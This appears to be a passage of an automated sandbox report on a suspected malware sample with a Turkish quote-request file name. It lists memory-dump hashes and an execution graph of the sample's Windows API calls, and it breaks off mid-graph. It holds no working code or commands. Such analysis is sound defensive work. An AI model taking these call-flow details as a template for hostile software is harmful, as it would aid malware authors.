                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 62748d8798cc957a1a8e0f9c49205f027c2c11c5ce961ef1c0e22bf4a1faba1d
                                                                                                              • Instruction ID: d93c27ed685e2327709836c6639313d9a5c0ceff0103d1381ba604b693735584
                                                                                                              • Opcode Fuzzy Hash: 62748d8798cc957a1a8e0f9c49205f027c2c11c5ce961ef1c0e22bf4a1faba1d
                                                                                                              • Instruction Fuzzy Hash: 11214971514308FFEB05DFA4D9C0B29BB65FB85324F20C66DE9094B243C376D806CA62
                                                                                                              Function 0122D01C Relevance: .1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e21dd99dd6d76cf58e674c8bb042edd8ff4c5979bb110d41b1d271cd932903fe
                                                                                                              • Instruction ID: c315fa1897340479394c7ca900edab1db31bb77eb822a89d789084dd33f8967c
                                                                                                              • Opcode Fuzzy Hash: e21dd99dd6d76cf58e674c8bb042edd8ff4c5979bb110d41b1d271cd932903fe
                                                                                                              • Instruction Fuzzy Hash: E6213771514348EFDB15DFA4D8C0B1ABB61FB84314F20C56DE9090B266C37BD507CA62
                                                                                                              Function 0122D006 Relevance: .1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c701f3d7fa54a02e5ce9aab35114cd7f046497c20befde2a3008935c7528536
                                                                                                              • Instruction ID: 75298a8174b1937086c98055a43fda853e3f3609817809ae613942a633c45749
                                                                                                              • Opcode Fuzzy Hash: 4c701f3d7fa54a02e5ce9aab35114cd7f046497c20befde2a3008935c7528536
                                                                                                              • Instruction Fuzzy Hash: 6621B0714083849FCB02CF24D994715BF71EB46314F28C5DAD9498F2A7C33A980ACB62
                                                                                                              Function 0121D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                                              • Instruction ID: 59592adaee3476c27d917b7cf02395bbe047e232a538c76f12596d425c54493e
                                                                                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                                              • Instruction Fuzzy Hash: FB110376404284DFCB16CF54D9C4B16BFB1FB94318F24C6A9D9090B65BC336D45ACBA2
                                                                                                              Function 0121D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                                              • Instruction ID: c221ce19112c6052d129319eb0e2d98be5eda0fd9ad6201f8fe65347d99015fa
                                                                                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                                                                                              • Instruction Fuzzy Hash: 21113372400284DFCB12CF44C9C4B56BFB1FB94324F24C2A9D9090B21BC33AE456CBA2
                                                                                                              Function 0122D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551089342.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_122d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                                                              • Instruction ID: 0e8a5be45bcb7d3ab36ff45990bfddd800b5bd855af05636337a424dec8a2911
                                                                                                              • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                                                              • Instruction Fuzzy Hash: F211BB75904284EFDB02CF54C5C0B19FFA1FB85224F24C6A9D9494B697C33AD44ACB62
                                                                                                              Function 0121D745 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0076365e4033cabefbda0104519698fc35225f2e9bffb46f249e1f13faf436f
                                                                                                              • Instruction ID: ff4fec08b55a0c624880a1fd58458d185bfc921699cf78a425d911e9e68cc478
                                                                                                              • Opcode Fuzzy Hash: a0076365e4033cabefbda0104519698fc35225f2e9bffb46f249e1f13faf436f
                                                                                                              • Instruction Fuzzy Hash: 8501FC71014388DAF7149EA9CD88B67BBD8EF51620F08C519DE040A24BD2799402CA72
                                                                                                              Function 0121D744 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1551014891.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_121d000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 73d74756f7eb0f723b65d1f6ada2e35532ac1d61a596dec4e04c68249d94c06f
                                                                                                              • Instruction ID: 9822367e3d1acd0f5357ea753c846df0aa828280c0ee899e1d9b982ef23af601
                                                                                                              • Opcode Fuzzy Hash: 73d74756f7eb0f723b65d1f6ada2e35532ac1d61a596dec4e04c68249d94c06f
                                                                                                              • Instruction Fuzzy Hash: 0DF0C271004384EEE7148E19CC88B62FFD8EB51634F18C45AEE084A287C2799841CBB1

                                                                                                              Non-executed Functions

                                                                                                              Function 05650040 Relevance: .3, Instructions: 315COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 69b5f12a7a5ee704a79654e8890869ba2825a6c5242d4315f8d01307e87e5b97
                                                                                                              • Instruction ID: 68918b2e93221d126a208cbe4d504f6040dfa6fd5ff7a67a2cef4c1e396f5669
                                                                                                              • Opcode Fuzzy Hash: 69b5f12a7a5ee704a79654e8890869ba2825a6c5242d4315f8d01307e87e5b97
                                                                                                              • Instruction Fuzzy Hash: 7512A7F2C8976D8BD710CF65E84C189BBB1B745394BD04A09D3622F2E1DBB8116ACF44
                                                                                                              Function 09105050 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41caea8411185ae7fb9f9970d014624d42092ca561f1f1302d6a9ec1060b4922
                                                                                                              • Instruction ID: aa470098abe12001be4e5d42ec94021107bbb3ec71192548cfc4980f3e21a204
                                                                                                              • Opcode Fuzzy Hash: 41caea8411185ae7fb9f9970d014624d42092ca561f1f1302d6a9ec1060b4922
                                                                                                              • Instruction Fuzzy Hash: 88E14A74E002198FDB14DF99C590AAEBBF2FF89305F248159E815AB385D771AD41CF60
                                                                                                              Function 09103088 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6e0d1a93026310cc539bc9417521bab8db8e4cf2e317e712bc18a929d76065d
                                                                                                              • Instruction ID: 373bd6b21f92c873efb0e3bdce9d9ac6efe29966ad93aaa1dac991faec2f3d13
                                                                                                              • Opcode Fuzzy Hash: e6e0d1a93026310cc539bc9417521bab8db8e4cf2e317e712bc18a929d76065d
                                                                                                              • Instruction Fuzzy Hash: 9EE12974E002198FDB15DFA9C5909AEBBF2FF89305F248169D424AB395C7319D42CFA0
                                                                                                              Function 091038F8 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53f11da23e25b7af868e721c6c701769a7ae49a4b0ab574fccb104f108c8b631
                                                                                                              • Instruction ID: 6680dd2afbc6292943ac59ca96e5ac39099a932132888a9a9348f142055343a4
                                                                                                              • Opcode Fuzzy Hash: 53f11da23e25b7af868e721c6c701769a7ae49a4b0ab574fccb104f108c8b631
                                                                                                              • Instruction Fuzzy Hash: 5BE10974E002198FDB14DFA9C590AAEBBF2FF89305F248159E425AB395D7319D42CFA0
                                                                                                              Function 09102C50 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3eef5ae51d52f65f4e78233b5e12f934f9b24fc6037a8de790992832aca981aa
                                                                                                              • Instruction ID: a7ca527f836dc86d7e9926928b5f9c2ea5f800c6af2079306ecc1251947ff917
                                                                                                              • Opcode Fuzzy Hash: 3eef5ae51d52f65f4e78233b5e12f934f9b24fc6037a8de790992832aca981aa
                                                                                                              • Instruction Fuzzy Hash: 52E11974E002198FDB14DFA9C590AAEBBF2FF89305F248169D825AB395D731AD41CF60
                                                                                                              Function 091034C0 Relevance: .3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eb830a2c2f14a981efd8f8a56e8b6bffb6ccae609cc88af5fbfbf44b9ab532ba
                                                                                                              • Instruction ID: 4369b7483c3c719301b68733f19b023719e232addfce6c7d6abe2d36f7c37017
                                                                                                              • Opcode Fuzzy Hash: eb830a2c2f14a981efd8f8a56e8b6bffb6ccae609cc88af5fbfbf44b9ab532ba
                                                                                                              • Instruction Fuzzy Hash: 93E10974E002198FDB14DF99C5909AEBBF2FF89305F248169D425AB395D7319D42CF60
                                                                                                              Function 02F3D63C Relevance: .3, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1552045682.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2f30000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ffc76036321aae15c1f8633e031133fb004c46b0ca02d857a546a59933aee4c0
                                                                                                              • Instruction ID: 552f453196512e21807c529e2e489b682d242f0f123848dfc57fba66902f9544
                                                                                                              • Opcode Fuzzy Hash: ffc76036321aae15c1f8633e031133fb004c46b0ca02d857a546a59933aee4c0
                                                                                                              • Instruction Fuzzy Hash: 18A18F36E00219CFCF0ADFB4C84499EB7B2FF85344B15466AEA05AB265DB71E915CF80
                                                                                                              Function 0565001A Relevance: .2, Instructions: 230COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1558402839.0000000005650000.00000040.00000800.00020000.00000000.sdmp, Offset: 05650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_5650000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d27be4afe3c692f58345d41c9f73af34c918724a6064c79359e098cebb268a5d
                                                                                                              • Instruction ID: 8c59f5451dc6aa3ee6fbab885ce74074be1800f657cfcc475e89ee68e4a81544
                                                                                                              • Opcode Fuzzy Hash: d27be4afe3c692f58345d41c9f73af34c918724a6064c79359e098cebb268a5d
                                                                                                              • Instruction Fuzzy Hash: 8DC12BB2C8476D8BD710CF74E84C189BB71BB853A4F904A09D3626F2D0DBB8246ACF44
                                                                                                              Function 09103081 Relevance: .1, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 909cf27dea7c51aa5ea8ccebebfa104505878e4b3f095643d6ce2651d5a12f9f
                                                                                                              • Instruction ID: 29aef03b64bd65f53a56b449df802104bfc0ada6e6377cb6ebe2f694ea09f3da
                                                                                                              • Opcode Fuzzy Hash: 909cf27dea7c51aa5ea8ccebebfa104505878e4b3f095643d6ce2651d5a12f9f
                                                                                                              • Instruction Fuzzy Hash: C2510974E002198FDB18CFA9C9905AEBBF2BF89305F248169D428AB255D7319D42CFA1
                                                                                                              Function 09107491 Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1561726451.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_9100000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 535afc7b0c15b4a8d83e96c352a36f16de7f9d0d91cf31081cdfecf09f944066
                                                                                                              • Instruction ID: f799083cd6aaffe1491bd84c4813ad6b1997c933c124148284a466ce1b506e09
                                                                                                              • Opcode Fuzzy Hash: 535afc7b0c15b4a8d83e96c352a36f16de7f9d0d91cf31081cdfecf09f944066
                                                                                                              • Instruction Fuzzy Hash: F841C671E05668CFEB28CF66CC107DEBBB6AF89304F04C1EAD848A6291D7755A85CF41

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.4%
                                                                                                              Dynamic/Decrypted Code Coverage:2.7%
                                                                                                              Signature Coverage:5.8%
                                                                                                              Total number of Nodes:553
                                                                                                              Total number of Limit Nodes:68
                                                                                                              execution_graph 95750 41f180 95751 41f18b 95750->95751 95753 41b940 95750->95753 95754 41b966 95753->95754 95761 409d40 95754->95761 95756 41b972 95760 41b993 95756->95760 95769 40c1c0 95756->95769 95758 41b985 95805 41a680 95758->95805 95760->95751 95808 409c90 95761->95808 95763 409d4d 95764 409d54 95763->95764 95820 409c30 95763->95820 95764->95756 95770 40c1e5 95769->95770 96233 40b1c0 95770->96233 95772 40c23c 96237 40ae40 95772->96237 95774 40c4b3 95774->95758 95775 40c262 95775->95774 96246 4143a0 95775->96246 95777 40c2a7 95777->95774 96249 408a60 95777->96249 95779 40c2eb 95779->95774 96257 41a4d0 95779->96257 95783 40c341 95784 40c348 95783->95784 96269 419fe0 95783->96269 95785 41bd90 2 API calls 95784->95785 95787 40c355 95785->95787 95787->95758 95789 40c392 95790 41bd90 2 API calls 95789->95790 95791 40c399 95790->95791 95791->95758 95792 40c3a2 95793 40f4a0 3 API calls 95792->95793 95794 40c416 95793->95794 95794->95784 95795 40c421 95794->95795 95796 41bd90 2 API calls 95795->95796 95797 40c445 95796->95797 96274 41a030 95797->96274 95800 419fe0 2 API calls 95801 40c480 95800->95801 95801->95774 96279 419df0 95801->96279 95804 41a680 2 API calls 95804->95774 95806 41af30 LdrLoadDll 95805->95806 95807 41a69f ExitProcess 95806->95807 95807->95760 95839 418b90 95808->95839 95812 409cac 95813 409cb6 95812->95813 95846 41b280 95812->95846 95813->95763 95815 409cf3 95815->95813 95857 409ab0 95815->95857 95817 409d13 95863 409620 LdrLoadDll 95817->95863 95819 409d25 95819->95763 95821 409c4a 95820->95821 95822 41b570 LdrLoadDll 95820->95822 96208 41b570 95821->96208 95822->95821 95825 41b570 LdrLoadDll 95826 409c71 95825->95826 95827 40f180 95826->95827 95828 40f199 95827->95828 96216 40b040 95828->96216 95830 40f1ac 96220 41a1b0 95830->96220 95834 40f1d2 95835 40f1fd 95834->95835 96226 41a230 95834->96226 95837 41a460 2 API calls 95835->95837 95838 409d65 95837->95838 95838->95756 95840 418b9f 95839->95840 95864 414e50 95840->95864 95842 409ca3 95843 418a40 95842->95843 95870 41a5d0 95843->95870 95847 41b299 95846->95847 95877 414a50 95847->95877 95849 41b2b1 95850 41b2ba 95849->95850 95916 41b0c0 95849->95916 95850->95815 95852 41b2ce 95852->95850 95934 419ed0 95852->95934 95860 409aca 95857->95860 96186 407ea0 95857->96186 95859 409ad1 95859->95817 95860->95859 96199 408160 95860->96199 95863->95819 95865 414e5e 95864->95865 95866 414e6a 95864->95866 95865->95866 95869 4152d0 LdrLoadDll 95865->95869 95866->95842 95868 414fbc 95868->95842 95869->95868 95873 41af30 95870->95873 95872 418a55 95872->95812 95874 41af40 95873->95874 95875 41af62 95873->95875 95876 414e50 LdrLoadDll 95874->95876 95875->95872 95876->95875 95878 414d85 95877->95878 95888 414a64 95877->95888 95878->95849 95880 414b44 95881 414b90 95880->95881 95882 414b73 95880->95882 95885 414b7d 95880->95885 95947 41a330 95881->95947 96004 41a430 LdrLoadDll 95882->96004 95885->95849 95886 414bb7 95887 41bd90 2 API calls 95886->95887 95889 414bc3 95887->95889 95888->95878 95942 419c20 95888->95942 95889->95885 95890 414d49 95889->95890 95891 414d5f 95889->95891 95896 414c52 95889->95896 95892 41a460 2 API calls 95890->95892 96013 414790 LdrLoadDll NtReadFile NtClose 95891->96013 95893 414d50 95892->95893 95893->95849 95895 414d72 95895->95849 95897 414cb9 95896->95897 95899 414c61 95896->95899 95897->95890 95898 414ccc 95897->95898 96006 41a2b0 95898->96006 95901 414c66 95899->95901 95902 414c7a 95899->95902 96005 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 95901->96005 95904 414c97 95902->95904 95905 414c7f 95902->95905 95904->95893 95962 414410 95904->95962 95950 4146f0 95905->95950 95907 414c70 95907->95849 95910 414d2c 96010 41a460 95910->96010 95911 414c8d 95911->95849 95914 414caf 95914->95849 95915 414d38 95915->95849 95917 41b0d1 95916->95917 95918 41b0e3 95917->95918 96031 41bd10 95917->96031 95918->95852 95920 41b104 96034 414070 95920->96034 95922 41b150 95922->95852 95923 41b127 95923->95922 95924 414070 3 API calls 95923->95924 95926 41b149 95924->95926 95926->95922 96059 415390 95926->96059 95927 41b1da 95928 41b1ea 95927->95928 96153 41aed0 LdrLoadDll 95927->96153 96069 41ad40 95928->96069 95931 41b218 96148 419e90 95931->96148 95935 41af30 LdrLoadDll 95934->95935 95936 419eec 95935->95936 96180 1b82c0a 95936->96180 95937 419f07 95939 41bd90 95937->95939 96183 41a640 95939->96183 95941 41b329 95941->95815 95943 419c3c 95942->95943 95944 41af30 LdrLoadDll 95942->95944 95943->95880 95945 41af30 LdrLoadDll 95943->95945 95944->95943 95946 419c7c 95945->95946 95946->95880 95948 41af30 LdrLoadDll 95947->95948 95949 41a34c NtCreateFile 95948->95949 95949->95886 95951 41470c 95950->95951 95952 41a2b0 LdrLoadDll 95951->95952 95953 41472d 95952->95953 95954 414734 95953->95954 95955 414748 95953->95955 95957 41a460 2 API calls 95954->95957 95956 41a460 2 API calls 95955->95956 95959 414751 95956->95959 95958 41473d 95957->95958 95958->95911 96014 41bfa0 LdrLoadDll RtlAllocateHeap 95959->96014 95961 41475c 95961->95911 95963 41445b 95962->95963 95964 41448e 95962->95964 95966 41a2b0 LdrLoadDll 95963->95966 95965 4145d9 95964->95965 95969 4144aa 95964->95969 95967 41a2b0 LdrLoadDll 95965->95967 95968 414476 95966->95968 95974 4145f4 95967->95974 95970 41a460 2 API calls 95968->95970 95972 41a2b0 LdrLoadDll 95969->95972 95971 41447f 95970->95971 95971->95914 95973 4144c5 95972->95973 95976 4144e1 95973->95976 95977 4144cc 95973->95977 96027 41a2f0 LdrLoadDll 95974->96027 95980 4144e6 95976->95980 95981 4144fc 95976->95981 95979 41a460 2 API calls 95977->95979 95978 41462e 95982 41a460 2 API calls 95978->95982 95983 4144d5 95979->95983 95984 41a460 2 API calls 95980->95984 95989 414501 95981->95989 96015 41bf60 95981->96015 95985 414639 95982->95985 95983->95914 95986 4144ef 95984->95986 95985->95914 95986->95914 95997 414513 95989->95997 96018 41a3e0 95989->96018 95990 414567 95991 41457e 95990->95991 96026 41a270 LdrLoadDll 95990->96026 95993 414585 95991->95993 95994 41459a 95991->95994 95995 41a460 2 API calls 95993->95995 95996 41a460 2 API calls 95994->95996 95995->95997 95998 4145a3 95996->95998 95997->95914 95999 4145cf 95998->95999 96021 41bb60 95998->96021 95999->95914 96001 4145ba 96002 41bd90 2 API calls 96001->96002 96003 4145c3 96002->96003 96003->95914 96004->95885 96005->95907 96007 41af30 LdrLoadDll 96006->96007 96008 414d14 96007->96008 96009 41a2f0 LdrLoadDll 96008->96009 96009->95910 96011 41af30 LdrLoadDll 96010->96011 96012 41a47c NtClose 96011->96012 96012->95915 96013->95895 96014->95961 96028 41a600 96015->96028 96017 41bf78 96017->95989 96019 41a3fc NtReadFile 96018->96019 96020 41af30 LdrLoadDll 96018->96020 96019->95990 96020->96019 96022 41bb84 96021->96022 96023 41bb6d 96021->96023 96022->96001 96023->96022 96024 41bf60 2 API calls 96023->96024 96025 41bb9b 96024->96025 96025->96001 96026->95991 96027->95978 96029 41af30 LdrLoadDll 96028->96029 96030 41a61c RtlAllocateHeap 96029->96030 96030->96017 96154 41a510 96031->96154 96033 41bd3d 96033->95920 96035 414081 96034->96035 96037 414089 96034->96037 96035->95923 96036 41435c 96036->95923 96037->96036 96157 41cf00 96037->96157 96039 4140dd 96040 41cf00 2 API calls 96039->96040 96044 4140e8 96040->96044 96041 414136 96043 41cf00 2 API calls 96041->96043 96046 41414a 96043->96046 96044->96041 96162 41cfa0 96044->96162 96045 41cf00 2 API calls 96048 4141bd 96045->96048 96046->96045 96047 41cf00 2 API calls 96056 414205 96047->96056 96048->96047 96050 414334 96169 41cf60 LdrLoadDll RtlFreeHeap 96050->96169 96052 41433e 96170 41cf60 LdrLoadDll RtlFreeHeap 96052->96170 96054 414348 96171 41cf60 LdrLoadDll RtlFreeHeap 96054->96171 96168 41cf60 LdrLoadDll RtlFreeHeap 96056->96168 96057 414352 96172 41cf60 LdrLoadDll RtlFreeHeap 96057->96172 96060 4153a1 96059->96060 96061 414a50 8 API calls 96060->96061 96063 4153b7 96061->96063 96062 41540a 96062->95927 96063->96062 96064 4153f2 96063->96064 96065 415405 96063->96065 96066 41bd90 2 API calls 96064->96066 96067 41bd90 2 API calls 96065->96067 96068 4153f7 96066->96068 96067->96062 96068->95927 96173 41ac00 96069->96173 96071 41ad54 96072 41ac00 LdrLoadDll 96071->96072 96073 41ad5d 96072->96073 96074 41ac00 LdrLoadDll 96073->96074 96075 41ad66 96074->96075 96076 41ac00 LdrLoadDll 96075->96076 96077 41ad6f 96076->96077 96078 41ac00 LdrLoadDll 96077->96078 96079 41ad78 96078->96079 96080 41ac00 LdrLoadDll 96079->96080 96081 41ad81 96080->96081 96082 41ac00 LdrLoadDll 96081->96082 96083 41ad8d 96082->96083 96084 41ac00 LdrLoadDll 96083->96084 96085 41ad96 96084->96085 96086 41ac00 LdrLoadDll 96085->96086 96087 41ad9f 96086->96087 96088 41ac00 LdrLoadDll 96087->96088 96089 41ada8 96088->96089 96090 41ac00 LdrLoadDll 96089->96090 96091 41adb1 96090->96091 96092 41ac00 LdrLoadDll 96091->96092 96093 41adba 96092->96093 96094 41ac00 LdrLoadDll 96093->96094 96095 41adc6 96094->96095 96096 41ac00 LdrLoadDll 96095->96096 96097 41adcf 96096->96097 96098 41ac00 LdrLoadDll 96097->96098 96099 41add8 96098->96099 96100 41ac00 LdrLoadDll 96099->96100 96101 41ade1 96100->96101 96102 41ac00 LdrLoadDll 96101->96102 96103 41adea 96102->96103 96104 41ac00 LdrLoadDll 96103->96104 96105 41adf3 96104->96105 96106 41ac00 LdrLoadDll 96105->96106 96107 41adff 96106->96107 96108 41ac00 LdrLoadDll 96107->96108 96109 41ae08 96108->96109 96110 41ac00 LdrLoadDll 96109->96110 96111 41ae11 96110->96111 96112 41ac00 LdrLoadDll 96111->96112 96113 41ae1a 96112->96113 96114 41ac00 LdrLoadDll 96113->96114 96115 41ae23 96114->96115 96116 41ac00 LdrLoadDll 96115->96116 96117 41ae2c 96116->96117 96118 41ac00 LdrLoadDll 96117->96118 96119 41ae38 96118->96119 96120 41ac00 LdrLoadDll 96119->96120 96121 41ae41 96120->96121 96122 41ac00 LdrLoadDll 96121->96122 96123 41ae4a 96122->96123 96124 41ac00 LdrLoadDll 96123->96124 96125 41ae53 96124->96125 96126 41ac00 LdrLoadDll 96125->96126 96127 41ae5c 96126->96127 96128 41ac00 LdrLoadDll 96127->96128 96129 41ae65 96128->96129 96130 41ac00 LdrLoadDll 96129->96130 96131 41ae71 96130->96131 96132 41ac00 LdrLoadDll 96131->96132 96133 41ae7a 96132->96133 96134 41ac00 LdrLoadDll 96133->96134 96135 41ae83 96134->96135 96136 41ac00 LdrLoadDll 96135->96136 96137 41ae8c 96136->96137 96138 41ac00 LdrLoadDll 96137->96138 96139 41ae95 96138->96139 96140 41ac00 LdrLoadDll 96139->96140 96141 41ae9e 96140->96141 96142 41ac00 LdrLoadDll 96141->96142 96143 41aeaa 96142->96143 96144 41ac00 LdrLoadDll 96143->96144 96145 41aeb3 96144->96145 96146 41ac00 